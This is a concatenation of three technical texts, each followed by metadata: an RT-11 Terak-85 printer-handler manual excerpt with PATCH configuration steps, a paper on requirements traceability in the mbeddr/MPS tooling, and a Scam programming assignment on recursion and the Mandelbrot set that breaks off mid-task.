</thead>
<tbody>
<tr><td></td><td>Allows the sense of the error bit to be reversed in case the signal is actually clear to send or data set ready in place of error (see the Hang option). If no error, the hang option has effect.</td></tr>
</tbody>
</table>

<table>
<thead>
<tr><th>SOFTWARE FORM FEED OPTION</th><th>Default = Hardware Form Feeds; Set SP SOFTFF, Set SP No SOFTFF</th></tr>
</thead>
<tbody>
<tr><td></td><td>If soft form feed, the form feed function is simulated by sending line feeds to fill out the page. If no SOFTFF, hardware form feed is assumed. If the handler is freshly loaded, it will assume that the printer is at top of form. To avoid forgetting the actual paper position between print jobs, command KMON to LOAD SP.</td></tr>
<tr><td>HEIGHT (for Software)</td><td>Default = 66; Set SP Height = xxx</td></tr>
<tr><td></td><td>The height set is used for soft form feeds to calculate the lines remaining on a page.</td></tr>
<tr><td>FILL CHARACTER</td><td>Default = Zero Fills; Set SP Fill = xxx</td></tr>
<tr><td></td><td>Sets SP to send xxx fill characters after every line feed character is sent.</td></tr>
</tbody>
</table>

To change SP to drive an SLU other than Unit #1, or to change to drive a line printer controller, patch the following locations:

<table>
<thead>
<tr><th>NAME</th><th>LOCN</th><th>OLD VALUE</th><th>FUNCTION</th></tr>
</thead>
<tbody>
<tr><td>SPS</td><td>1046</td><td>177524</td><td>Status Reg Address</td></tr>
<tr><td>SPB</td><td>1204</td><td>177526</td><td>Data Reg Address</td></tr>
<tr><td>SPSTRT</td><td>1000</td><td>124</td><td>Transmitter Vector</td></tr>
</tbody>
</table>

For example, to change to drive SLU #7:

```
R PATCH
FILENAME --- SP.SYS <return>
#1046/177524 176574 <return>
#1204/177526 176576 <return>
#1000/124 354 <return>
#E
```
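The soft form-feed behaviour described in the SET SP options above (simulating a form feed by sending enough line feeds to fill out a page of the configured HEIGHT, starting from top of form when the handler is freshly loaded) can be illustrated with a short sketch. The C code below is only an illustration of that idea under those assumptions; it is not the actual SP handler code.

```c
#include <stdio.h>

#define PAGE_HEIGHT 66          /* default HEIGHT setting */

static int current_line = 0;    /* handler assumes top of form when loaded */

/* Count line feeds so we know how far down the page we are. */
static void send_line_feed(void)
{
    putchar('\n');
    current_line = (current_line + 1) % PAGE_HEIGHT;
}

/* Simulate a hardware form feed by filling out the rest of the page. */
static void soft_form_feed(void)
{
    while (current_line != 0)
        send_line_feed();
}

int main(void)
{
    printf("page 1, line 1");
    send_line_feed();
    printf("page 1, line 2");
    send_line_feed();
    soft_form_feed();           /* next output starts at the top of the next page */
    printf("page 2, line 1");
    send_line_feed();
    return 0;
}
```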
{"Source-Url": "http://bitsavers.org/pdf/terak/60-0079-001_Rev_A_Software_Release_Guide_Terak-85_RT-11_Version_3B_Operating_System_excerpt_May_1981.pdf", "len_cl100k_base": 4572, "olmocr-version": "0.1.48", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 13716, "total-output-tokens": 4752, "length": "2e12", "weborganizer": {"__label__adult": 0.0005040168762207031, "__label__art_design": 0.0005154609680175781, "__label__crime_law": 0.0005159378051757812, "__label__education_jobs": 0.000492095947265625, "__label__entertainment": 0.00013506412506103516, "__label__fashion_beauty": 0.00020253658294677737, "__label__finance_business": 0.0008106231689453125, "__label__food_dining": 0.00023758411407470703, "__label__games": 0.0015163421630859375, "__label__hardware": 0.08538818359375, "__label__health": 0.0002264976501464844, "__label__history": 0.0001882314682006836, "__label__home_hobbies": 0.000247955322265625, "__label__industrial": 0.0016965866088867188, "__label__literature": 0.0001614093780517578, "__label__politics": 0.00017344951629638672, "__label__religion": 0.0005145072937011719, "__label__science_tech": 0.01549530029296875, "__label__social_life": 5.9723854064941406e-05, "__label__software": 0.43212890625, "__label__software_dev": 0.4580078125, "__label__sports_fitness": 0.0002510547637939453, "__label__transportation": 0.00039577484130859375, "__label__travel": 0.00017309188842773438}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18182, 0.04121]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18182, 0.16295]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18182, 0.87436]], "google_gemma-3-12b-it_contains_pii": [[0, 1225, false], [1225, 1225, null], [1225, 3094, null], [3094, 5849, null], [5849, 7455, null], [7455, 9592, null], [9592, 12427, null], [12427, 12991, null], [12991, 14785, null], [14785, 16306, null], [16306, 16690, null], [16690, 18182, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1225, true], [1225, 1225, null], [1225, 3094, null], [3094, 5849, null], [5849, 7455, null], [7455, 9592, null], [9592, 12427, null], [12427, 12991, null], [12991, 14785, null], [14785, 16306, null], [16306, 16690, null], [16690, 18182, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18182, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18182, null]], "pdf_page_numbers": [[0, 1225, 1], [1225, 1225, 2], [1225, 3094, 3], [3094, 5849, 4], [5849, 7455, 5], [7455, 9592, 6], [9592, 12427, 7], [12427, 12991, 8], [12991, 14785, 9], [14785, 16306, 10], [16306, 16690, 11], [16690, 18182, 12]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18182, 0.21717]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
bebd78c42a36a0fba24f38e9bdcbef1dcba00361
Requirements as First-Class Citizens: Integrating Requirements closely with Implementation Artifacts Markus Voelter independent/itemis Stuttgart, Germany voelter@acm.org Federico Tomassetti Politecnico di Torino Torino, Italy federico.tomassetti@polito.it Abstract—Requirements often play second fiddle in software development projects. The tools for managing requirements often just support "numbered lists of prose paragraphs", and they don’t integrate well with the tools used for implementing the system. This leads to all kinds of challenges in terms of versioning and traceability. Moreover, because they are mainly prose text, they cannot easily be checked for consistency and completeness, limiting their usefulness. In this paper we describe an alternative approach, where requirements are (at least partially) formalized to support consistency checking, where parts of requirements can be used directly as the implementation, and where requirements are managed with the same tools that are used for system development. The approach is illustrated with the mbeddr system, a comprehensive IDE for embedded software development based on an extensible version of C and domain-specific languages. I. INTRODUCTION Collecting, organizing and managing requirements is mandatory for life-critical systems, essential for mission-critical ones and it can still be very useful in the development of other kinds of systems. Still, it is a cumbersome activity which either is relentlessly executed with major effort (typically if the customer or a certification standard/agency requires it) or it is mainly overlooked, leading to poorly structured and maintained requirements. CURRENT STATE In our opinion, one main problem with the traditional ways to collect and maintain requirements is the inadequacy of the supporting tools (see also the study in [5]; we discuss it in Related Work). In some fields, such as aerospace, automotive or telecoms, requirements are often collected and managed using MS Office documents or tools like DOORS, which basically gather paragraphs of text with no or very limited structure. The relation between requirements and other artifacts (i.e., implementation code, tests, etc.) is collected in other documents, or with comments in the code, requiring manual synchronization with the actual system implementation. It is not surprising that, when possible, practitioners try to escape this situation by either using simpler approaches for requirements elucidation (such as CRC cards1 and user stories) or completely avoiding it. 1http://en.wikipedia.org/wiki/CRC_Cards While agile approaches to requirements engineering limit the burden of managing them, they often do not provide a maintenance strategy for requirements; instead they are considered transient artifacts. This is not acceptable in many domains, where standards require a more structured approach to requirements management. OUR APPROACH The current state of the art can be improved by the seamless integration of requirements engineering concerns into software development tools, developed with language workbenches. This would lead to four main benefits: - reuse of well known tooling: both for editing of requirements and for managing and versioning them. This limits the accidental complexity introduced by requirements engineering. - ease of creating requirement traces: creating links between requirements and artifacts can become much simpler. 
More importantly, the tool can help to keep traces consistent, - ability to query the requirements model: getting some practical benefits from the requirements not only during the validation phase but also during development. The practitioner (either a developer or a business analyst) will be able to navigate relations between requirements and artifacts and see, for examples, which requirements are related to failing tests or are not connected to implementing artifacts. - extensibility: by using the language modularization and composition features supported by language workbenches, domain-specific extensions to (generic) requirements documents can be seamlessly integrated. In this paper we illustrate an approach that permits the reduction of the cost of maintaining requirements and helps to better leverage them, with immediate benefits to practitioners. Our approach is based on the mbeddr technology stack, which, in turn, is based on JetBrains MPS (discussed below). This tool stack allows us to scale the level of sophistication of the language used to express requirements to the needs of the project. This way, agile projects can use a basic version of the language to express requirements in a very lightweight form. For more demanding contexts, for example the development of complex embedded systems, the tooling permits to plug-in domain-specific extensions of the requirements language, supporting a more sophisticated approach to requirements management. **MBEDDR** mbeddr\(^2\) is an open source project supporting embedded software development based on incremental, modular domain-specific extension of C. It also supports other languages, which is what we exploit in this paper. Figure 1 shows an overview, details are in [3] and [4]. **Figure 1.** The mbeddr technology stack rests on the MPS language workbench. Above it, the first language layer contains an extensible version of the C programming language plus special support for logging/error reporting and build system integration. On top of that, mbeddr comes with a set of default C extensions plus cross-cutting support for requirements, traceability and product line variability. mbeddr builds on the JetBrains MPS language workbench\(^3\), a tool that supports the definition, composition and use of general purpose or domain-specific languages. MPS uses a projectional editor, which means that, although a syntax may look textual, it is not represented as a sequence of characters which are transformed into an abstract syntax tree (AST) by a parser. Instead, a user’s editing actions lead directly to changes in the AST. Projection rules render a concrete syntax from the AST. Consequently, MPS supports non-textual notations such as tables, and it also supports unconstrained language composition and extension – no parser ambiguities can ever result from combining languages. The next layer in mbeddr is an extensible implementation of the C99 programming language in MPS. On top of that, mbeddr ships with a library of reusable extensions relevant to embedded software. As a user writes a program, he can import language extensions from the library them into his program. The main extensions include test cases, interfaces and components, state machines, decision tables and data types with physical units. For many of these extensions, mbeddr provides an integration with static verification tools (model checking state machines, verifying interface contracts or checking decision tables for consistency and completeness; see also [2]). 
Finally, mbeddr supports two important aspects of the software engineering process: requirements and product line variability. Both are implemented in a generic way that makes them reusable with any mbeddr-based language. We discuss requirements in detail in the remainder of this paper. ### II. Challenges and Solutions In this section we describe a set of current challenges in requirements engineering as well as our approach to solving them in mbeddr. #### A. Requirements Versioned with Code Traditionally, requirements are stored in a tool-specific database. Artifacts are instead typically stored in version control systems (VCS) such as git, SVN or ClearCase. This situation leads to synchronization problems when keeping requirements in sync with the implementation. The natural solution would be to store requirements and implementation artifacts in the same VCS. Since most of today’s VCS work with an update-and-merge strategy (as opposed to pessimistic locking), the requirements tool would need to support diff and merge for requirements as well. In mbeddr, requirements are collected with a special requirements language. Each requirement has an ID, a short description, an optional longer prose, a priority and any number of additional attributes. Requirements can also be nested. Figure 2 shows an example. **Figure 2.** Requirements in mbeddr are arranged as a tree. The colored dots on the left reflect the trace status of a requirement (discussed below). Importantly, since mbeddr is based on MPS, and MPS comes with a generic XML-based storage, all requirements are stored in XML files, along with any other implementation artifacts. MPS also supports diff and merge for any arbitrary language (based on the projected concrete syntax of each particular language), so we get support for diffing and merging requirements for free. mbeddr’s requirements tooling also has an importer to import requirements via XML or CSV files. This way, data migration from traditional requirements management tools is supported. --- \(^2\)http://mbeddr.com \(^3\)http://jetbrains.com/mps B. Traceability into Code When we talk about the integration between code and requirements, we first have to define what we mean by code. In the context of mbeddr, code is any program (or model) expressed with any MPS-based (programming or modeling) language. In particular, C, all extensions of C (default and user-defined) are considered code in the context of this discussion. The simplest kind of integration between code and requirements is tracing: a program element has a pointer to one or more requirements. Such a trace pointer essentially expresses that this particular element is somehow related to a set of requirements. By using different trace kinds, the nature of “somehow related” can be qualified. Trace kinds typically include implements or tests. ![Figure 3](image) Figure 3. A C module with a set of constants that have a trace to a single requirement each. The tracing facility in mbeddr can add traces to any program element expressed in any language. Figure 3 shows a piece of mbeddr program code. The root element is a module, and it has an annotation that specifies to which requirements modules we may want to trace from within that module. We can then add a trace to any program element in that module, tracing to any requirement in the referenced requirements module. There are four important characteristics of this implementation. 1) The requirements trace is not just a comment. 
It is a well-typed program element that can be used for all kinds of analyses. For example, it is possible to select the requirement, open the Find Usages dialog, and retrieve all program elements that have traces attached to the current requirement. 2) The trace is not an independent program element that is just "geographically close" to the program element it traces. Instead, the trace is a child element of the traced element. This means that, if you move, copy, cut or paste the element, the trace moves with it. 3) Since MPS is a projectional editor, the program can also be shown without the traces, if the user so desires. The traces are still there and can be turned back on again at any time. 4) The tracing facility is completely independent of the traced language. Program elements defined in any (MPS-based) language can be traced. Users can define new languages, and the tracing mechanism will work with the new language automatically. While our tracing framework cannot remove the burden of users to manually establish and maintain the traces according to the actual relationship between the code and the requirements, the approach does solve all technical challenges in providing universally-applicable tracing support. However, the fact that referential integrity is automatically checked and that arbitrary analyses can be built on top of the program/requirement/trace data, can be used to ease the work of the developer: requirements and traces are "real code", and not just second-class meta data. C. From Requirements to a Functional Architecture Many projects start out by collecting requirements in a tool such as DOORS, or in other prose-based “databases” like the one discussed for mbeddr above. However, using prose only, it is very hard to keep things consistent – after all there is no type checker or compiler for prose text. One problem in this context is the definition of (functional) components, their responsibilities and their collaborations with other components, which express the high-level, functional structuring of the to-be-built system. One way to get to such components is to play through collaboration scenarios. From these scenarios we can derive which data a components owns, which other components it collaborates with, and which services one component uses from another component as part of such collaborations. However, if we do this only with pen and paper (cf. CRC cards), it can be tough to keep things consistent (this is the prose-only problem in a different guise). At some point, we have to become (somewhat) more formal. In mbeddr, this is realized as follows. Requirements, as introduced above, have a requirement kind (such as functional, operational or usability). Requirements also have additional data. Since MPS supports arbitrary language extension and composition, it is possible to define additional DSLs that can be plugged into a requirement. To express the functional architecture, we have defined three new requirement kinds: actor (an actor outside the system boundary), component (a functional building block of the to-be-built system) and scenario (an examplary collaboration scenario between actors and components, not unlike sequence diagrams). ![Figure 4](image) Figure 4. A functional component. It owns a piece of data and provides two capabilities. It does not collaborate with any other component. Figure 4 shows an example of a functional component. Note how it lives inside a requirement, even though the original requirements language was not invasively changed. 
Figure 5 shows a scenario, expressed with a textual language, with all the usual IDE support. In particular, if component A uses a capability ("calls an operation on") a component B, and B is not defined as a collaborator of A, this results in an error in the IDE. A quick fix can then add B as a collaborator for A. Similarly, one can only use capabilities that are actually defined on the components. Finally, arguments to capabilities can only be taken from the data that is owned by the client component, or has been received from another capability call during that same scenario. As a consequence, after defining a set of scenarios, the components accumulate data, capabilities and collaborators that are necessary to execute the scenarios: a functional architecture arises, "enforced" by the underlying language and its constraints. Figure 5. A scenario that describes exemplary interactions between collaborating components (and external actors). **Visualization** Scenarios are reminiscent of sequence diagrams, so they can also be visualized this way (see Figure 6). To make this possible, we have integrated PlantUML4 into mbeddr – the diagram is rendered directly in the tool, and a double-click on a diagram element selects the underlying element in the editor. Additional diagrams show the components, their data items and capabilities and the collaborations. Another language extension supports defining use cases, and use case diagrams can be rendered from these. The use case attributes are extensible. **Extensibility** This language for expressing the functional architecture does not have expressions, sophisticated data types or a type checker. At this level of abstraction, these would be distractions – the goal of this language is the allocation of data, responsibilities and collaborations to high-level functional building blocks of an application. However, the language is extensible: new entities (in addition to components or actors) can be defined; components can own additional things (in addition to data items and capabilities) and scenarios can contain additional steps (in addition to capability calls, headings, or alternatives). For example, a component may contain a wireframe mockup (which would have to be drawn outside of MPS) to represent UI aspects. It is also possible to add additional properties and then check constraints based on these. For example, components may be allocated to layers, and constraints can be used to check whether collaborations and capability usages respect layer constraints (e.g., you can call from the business layer into the persistence layer, but not vice versa). These additional data and constraints can be added without invasively changing the basic scenario language, and can also be added after the initial set of components and scenarios have been defined, supporting incremental refinement of the language as we incrementally refine our understanding of the system. For example, systems engineers may first define the components and the scenarios. Then, in a second step, software architects may add the layer markup and the associated constraints, and then, if some of the constraints fail, split up or reallocate components to make them fit with the layer structure. Refactorings can be added to make such changes to the component structure simpler. D. 
Tracing into other Artifacts In many projects, requirements are not the last step before coding, and the functional architecture discussed in the previous section is too simplistic to describe the functionality of the system. Instead, other artifacts are developed, including system engineering models, function models or physical models. Often these models are built with tools such as Matlab/Simulink5 or Modelica6, or use formalisms such as EAST-ADL7. It is usually not possible to automatically derive software artifacts from such models, since they are 5http://www.mathworks.com 6https://www.modelica.org 7http://www.east-adl.info/ too abstract. However, as software artifacts are developed, it is necessary to relate the software artifacts to these models. To make this possible, mbeddr’s tracing framework is extensible: Other artifacts can be used as requirements targets as well (as long as the respective language constructs implement an mbeddr-provided interface). This way, arbitrary descriptions or models (such as system models, functional models or component models) can be traced to. By adding an import facility, models created with other engineering tools can be integrated reasonably well with mbeddr-based artifacts. For example, we are currently implementing an importer for Matlab/Simulink models to support tracing to simulink blocks from mbeddr program nodes. E. Formal Business Logic in Requirements The previous two subsections have addressed the challenge of becoming "more formal" with the goal of narrowing down the functional architecture of a system. Another way of getting incrementally closer to the implementation is to embed important parts of the business logic into requirements, and then use those in the implementation code. Figure 7. A calculation is a function embedded into a requirement. They include test cases that allow “business people” to play with the calculations. An interpreter evaluates tests directly in the IDE for quick turnaround. Figure 7 shows two requirements. The first one defines a constant BASE_POINTS with the type int8 and the value 10. The second requirement defines a calculation PointsForATrackpoint. A calculation has a name, a list of parameters, and a result expression, which, in this case, uses decision table (a two-dimensional representation of nested if-statements8). The calculation also references the BASE_POINTS constant. Using constants and calculations, business users can formally specify some important business data and rules, while not having to deal with the actual implementation of the overall system. To help with getting these data and rules correct, calculations also include test cases. These are evaluated directly in the IDE, using an interpreter: users can directly “play” with the calculations. CONNECTING TO CODE If the constants and calculations that business users specify in the requirements were only used in requirements, this would be only partially useful. In the end, these calculations should make their way into the code directly, without manual re-coding. Figure 8. Implementation code can directly call function calculations defined in requirements. In this case, a calculation is called from a component, expressed in the mbeddr’s components C extension. Figure 8 shows a component, expressed in mbeddr’s component extension to C. Inside the component we directly invoke a calculation (the green code), using function call syntax. When this code is translated to C, the expression in the calculation is translated into C and inlined. 
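The paper does not show the C code that the mbeddr generator emits for such a calculation, so the following is only a hand-written sketch of what the inlined result of a call like the one in Figure 8 could look like. Only the identifiers BASE_POINTS and PointsForATrackpoint are taken from the figures; the parameters, the decision-table conditions and the surrounding caller are invented for illustration.

```c
#include <stdint.h>

/* Constant defined in the requirements document (value taken from Figure 7). */
#define BASE_POINTS ((int8_t)10)

/* Hypothetical hand-written equivalent of the PointsForATrackpoint
 * calculation: the decision table becomes nested if-statements.
 * The parameters, conditions and result values below are invented
 * for illustration and are not taken from the paper. */
static int16_t PointsForATrackpoint(int16_t speed, int16_t altitude)
{
    if (speed > 100) {
        return (int16_t)(altitude > 2000 ? 4 * BASE_POINTS : 2 * BASE_POINTS);
    } else {
        return (int16_t)(altitude > 2000 ? 3 * BASE_POINTS : BASE_POINTS);
    }
}

/* After generation, implementation code (such as the component operation
 * shown in Figure 8) can call the calculation like any other C function,
 * or have its expression inlined at the call site. */
int16_t addPointsForTrackpoint(int16_t total, int16_t speed, int16_t altitude)
{
    return (int16_t)(total + PointsForATrackpoint(speed, altitude));
}
```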
The constant and the calculation are just examples of possible "plug in" languages into mbeddr’s requirements system. Any DSL, using a wide range of business user-friendly notations, can be plugged in and made available to C-based implementations. III. DISCUSSION The tooling described in this paper solves some important challenges in requirements engineering. However, it is not a complete solution (yet). For example, some contexts require information security or multi-client capability for the requirements. This is currently not addressed. Also, it is assumed that all artifacts reside in MPS, which limits the applicability of the approach. However, it is our opinion – and the core message of this paper – that any engineering tool should always be based on a language workbench like MPS that supports approaches like the one discussed in this paper. Another limitation is that no integration with current trends such as OSLC9 (Open Services for Lifecycle Collaboration) is provided. Finally, this paper only addresses the overall paradigm and tooling, it does not discuss a methodology for requirements management. In our opinion these two concerns are largely orthogonal: once a tool is as powerful and extensible as mbeddr/MPS, it can be adapted to many different methodologies or processes. It could be argued that the high-level components and scenarios discussed in Section II-C, as well as the formal business logic discussed in Section II-E are not requirements anymore, but rather architecture or design. However, we think that this distinction is arbitrary and not very helpful, especially in the context of a tool such as the one described in this paper: there has to be some consistent and integrated 8Projectional editors like MPS can deal with non-textual notations such as tables, vectors, matrices or fraction bars or "big sum" symbols. 9http://open-services.net/ path from prose requirements to the implementation code. The tooling discussed in this paper provides such a path. It is not important at which point is this continuum we stop calling the activity "requirements engineering". IV. RELATED WORK As mentioned in the introduction, Winkler and von Pilgrim [5] performed a literature review on traceability, considering it both for MDD and requirements. They conclude that tracing is rarely used in practice and the most prominent problem leading to this is the lack of proper tool support. Our approach provides a possible solution to this dilemma and could therefore contribute to helping practitioners in adopting requirements traceability, particularly, in contexts where the process requires it. DSLs have traditionally not seen much use in requirements engineering, they are typically associated more with the implementation phase or with software architecture. However, as we demonstrate in this paper, DSLs, especially extensible DSLs, can be very useful in requirements engineering. Other tools, for example, itemis’ Yakindu Requirements also implement this idea: it also uses (mostly) textual DSLs plus visualization. In contrast to our approach, however, extensibility is more limited, since the underlying language workbench (Eclipse XText) supports only limited forms of language extension. Favaro et al. [1] present an approach to requirements engineering that has some commonalities with ours. Like us, they have the goal to introduce structured, model-based requirements. 
Their approach relies on the use of a wiki enriched by semantic links, and they also provide a requirements browser inside the IDE (Eclipse) supporting some navigation capabilities from the requirement to the artifact (but not vice versa). They underline two points with which we strongly agree: a) the importance of having an adaptable mechanism for requirements, depending not only on the nature of the project but also on the kind of the requirement, with a lighter process for "non-technical" requirements; b) the fact that requirements and implementation artifacts are intrinsically integrated. We think, however, that our approach offers: a) better integration between requirements and artifacts, and b) the possibility to have both a flexible approach but also specific IDE support for any particular kind of formal language embedded into the requirements (thanks to the projectional editor). V. FUTURE WORK There are three main areas for future work. First, we will add reporting functionality, targetting requirements documents in HTML and Latex. The reports will include the diagrams, as well as trace reports. Another target is Excel, which is often the preferred way to get "numbers" by management. Second, a colleague of ours is currently working on an MPS editor component that supports mixing free text (with text-like editing support) and instances of language concepts. Integrating this editor with the requirements management tooling discussed in this paper will be extremely useful: for example, one could reference other requirements from within the prose description of a particular requirement, while making sure that this reference would take part in refactorings. VI. SUMMARY mbeddr’s core idea is discussed in [3]: building domain-specific tools is not just about adapting a tool to a particular domain (windows, buttons, tool bars). It is rather more important to adapt to the domain the languages, formalisms and data formats that underlie the tool. If you do this based on a language workbench, you get the tool adaptation essentially for free. This is because the actual tool, JetBrains MPS, is essentially a very powerful editor for any kind of language. By adapting the language, you get the adapted tool automatically. In this paper, we have demonstrated this idea for requirements management. All the benefits discussed in this paper involve only language engineering. No tool aspects have been customized. ACKNOWLEDGEMENTS We thank the mbeddr and MPS development teams for creating an incredibly powerful platform that can easily accomodate the features described in this paper. We would also like to thank Christoph Becker for making us aware of PlantUML and inspiring the scenario extension to requirements. We also want to thank Andreas Graf and Nora Ludewig for their feedback to the paper. REFERENCES 10http://www.yakindu.de/requirements/ 11http://eclipse.org/xtext
{"Source-Url": "https://confluence.jetbrains.com/download/attachments/54338465/voeltertomassetti-requirementsinmbeddr.pdf?api=v2&modificationDate=1412871214000&version=1", "len_cl100k_base": 5270, "olmocr-version": "0.1.51", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 18381, "total-output-tokens": 5872, "length": "2e12", "weborganizer": {"__label__adult": 0.0002646446228027344, "__label__art_design": 0.0002701282501220703, "__label__crime_law": 0.00023090839385986328, "__label__education_jobs": 0.0004897117614746094, "__label__entertainment": 4.661083221435547e-05, "__label__fashion_beauty": 0.00012218952178955078, "__label__finance_business": 0.0002415180206298828, "__label__food_dining": 0.0002689361572265625, "__label__games": 0.00036406517028808594, "__label__hardware": 0.0005898475646972656, "__label__health": 0.0003006458282470703, "__label__history": 0.00015151500701904297, "__label__home_hobbies": 5.745887756347656e-05, "__label__industrial": 0.00031113624572753906, "__label__literature": 0.00018966197967529297, "__label__politics": 0.00016939640045166016, "__label__religion": 0.0003459453582763672, "__label__science_tech": 0.0104217529296875, "__label__social_life": 6.80088996887207e-05, "__label__software": 0.005126953125, "__label__software_dev": 0.97900390625, "__label__sports_fitness": 0.00023674964904785156, "__label__transportation": 0.00037169456481933594, "__label__travel": 0.0001455545425415039}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28256, 0.00897]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28256, 0.55721]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28256, 0.92691]], "google_gemma-3-12b-it_contains_pii": [[0, 4665, false], [4665, 9093, null], [9093, 14019, null], [14019, 18049, null], [18049, 22860, null], [22860, 28256, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4665, true], [4665, 9093, null], [9093, 14019, null], [14019, 18049, null], [18049, 22860, null], [22860, 28256, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28256, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28256, null]], "pdf_page_numbers": [[0, 4665, 1], [4665, 9093, 2], [9093, 14019, 3], [14019, 18049, 4], [18049, 22860, 5], [22860, 28256, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28256, 0.0]]}
olmocr_science_pdfs
2024-12-04
2024-12-04
55b2c9986dca317413badc3634327b5720ff7fd1
Preliminary information

This is your first Scam assignment. To run your code, use the following command:

```sh
scam assign1.scm
```

At the top of your assignment, place a definition similar to the following:

```scm
(define (author)
    (println "AUTHOR: Rita Recursion rrita@crimson.ua.edu")
    )
```

with the name and email replaced by your own name and email.

Define this function as well, to help with testing your code:

```scm
(define (exprTest # $expr target)
    (define result (catch (eval $expr #)))
    (if (error? result)
        (println $expr " is EXCEPTION: " (result'value) " (it should be " target ")")
        (println $expr " is " result " (it should be " target ")")
        )
    )
```

For each numbered task (unless otherwise directed), you are to provide a function with a name of the form `runN`, with the `N` corresponding to the task number, starting at one (as in `run1`, `run2`, etc.). This function is in addition to all other requested functions. These `run` functions will test your implementation and are to take no arguments. For example, if task 5 is:

5. Implement factorial so that it implements a recursive process. Name your function `fact`.

you should provide a `run` function similar to:

```scm
(define (run5)
    (exprTest (fact 0) 1)
    (exprTest (fact 3) 6)
    ...
    )
```

Woe betide students who provide insufficient testing should their implementations prove to be incorrect! If you do not complete an exercise, do not provide a `run` function for that exercise. If you omit the `run` function corresponding to an exercise, it will be assumed that you are skipping that part and you will receive no credit for that exercise. When you have completed testing of your run functions, comment out any calls to them (but do not comment out the definitions).

I will provide a test script which performs minimal testing of your implementation. If your program does not pass the provided test script, I will not grade your exercise and you will receive zero credit for the assignment. If your program passes the provided test script, it will be graded with a more thorough set of tests.

It may be of use to know that you can have actual tabs and newlines within a string, as in:

```scm
(println "The quick brown fox
	jumped over the lazy dog")
```

which will print out as:

    The quick brown fox
    	jumped over the lazy dog

Another useful function for your run function is `inspect`. Here is an example usage:

    (inspect (+ 2 3))

which produces the output:

    (+ 2 3) is 5

You may not use assignment (assign or set!) in any of the code you write. Nor may you use any looping function such as while or for. You may not use lists or arrays.

Tasks

1. Explain why if and my-if (defined below) can behave differently for equivalent, legal inputs. Here is an example of equivalent calls to if and my-if that behave exactly the same, in terms of output:

        (define x 2)
        (define a (readInt))
        (inspect (if (= a 0) x (/ a x)))
        (inspect (my-if (= a 0) x (/ a x)))

    where my-if is defined as

        (define (my-if a b c)
            (if (true? a) b c)
            )

    In particular, give a concrete example in which the behavior is different. You will need to come up with specific cases that show this difference. Your run function should present this example and should explain precisely why the behavior is different.

2. Define a function, named zeno_cost, that computes the price of a ticket for Zeno’s Airlines given the distance \(d\) of the flight in stadia, the cost \(c\) of the first half of the trip in drachma, and a factor \(f\) for computing the cost of the rest of the trip.
The total cost of a ticket is computed as follows: \(c\) drachma for the first half of the trip and \( c \times f \) drachma for the first half of the remaining half. Of the part of the trip that still remains, the first half of that is \( c \times f \times f \) drachma. Indeed, the first half of the remaining portion always costs \( f \) times the cost of the previous portion. If the distance to be traveled is less than or equal to a daktylos (there are 9,600 daktylos to 1 stadion), then the cost of traveling that distance is a fixed cost of 7 drachma. Otherwise, if the cost of traveling half the distance to be traveled is less than or equal to a hemiobol (one-twelfth of a drachma), the cost of traveling the two halves is one hemiobol.

Your zeno_cost function should implement a recursive process. Expect real or integer numbers as arguments. Return the cost (a real number) in drachma.

3. The Mandelbrot set (for examples, see [link](http://www.softlab.ece.ntua.gr/miscellaneous/mandel/mandel.html)) is a set of planar points, a point \((x, y)\) being in the set if the following iteration never diverges to infinity:

\[
r = r^2 - s^2 + x \qquad \text{and} \qquad s = 2 \times r \times s + y
\]

